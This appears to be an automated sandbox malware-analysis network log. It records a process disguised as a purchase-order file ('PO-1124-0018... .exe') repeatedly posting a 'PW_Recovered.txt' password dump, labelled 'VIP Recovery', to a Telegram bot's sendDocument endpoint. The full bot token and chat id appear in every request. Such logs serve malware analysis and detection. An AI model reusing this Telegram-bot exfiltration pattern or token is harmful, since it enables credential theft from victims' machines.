                                                                                                                                            2024-12-16 13:15:33 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 62 35 37 35 37 34 31 63 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd22b575741c71Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:34 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:34 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:34 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17197,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354933,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            20192.168.2.449841149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:35 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd232ee45a716c
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:35 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 32 65 65 34 35 61 37 31 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd232ee45a716cContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:36 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:36 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:36 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17199,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354935,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            21192.168.2.449847149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:37 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd23bf4fc551b0
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:15:37 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 62 66 34 66 63 35 35 31 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd23bf4fc551b0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:38 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:37 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:38 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17201,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354937,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            22192.168.2.449853149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:39 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd24569962d1a7
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:39 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 35 36 39 39 36 32 64 31 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd24569962d1a7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:40 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:39 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 527
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:40 UTC527INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17203,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354939,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            23192.168.2.449859149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:41 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd24e9b84a7521
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:41 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 65 39 62 38 34 61 37 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd24e9b84a7521Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:41 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:41 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:41 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17205,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354941,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            24192.168.2.449864149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:43 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd257981da6897
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:43 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 37 39 38 31 64 61 36 38 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd257981da6897Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:44 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:44 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 530
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:44 UTC530INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17207,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354944,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            25192.168.2.449871149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:45 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd261610f8ea3a
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:15:45 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 31 36 31 30 66 38 65 61 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd261610f8ea3aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:46 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:46 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:46 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22
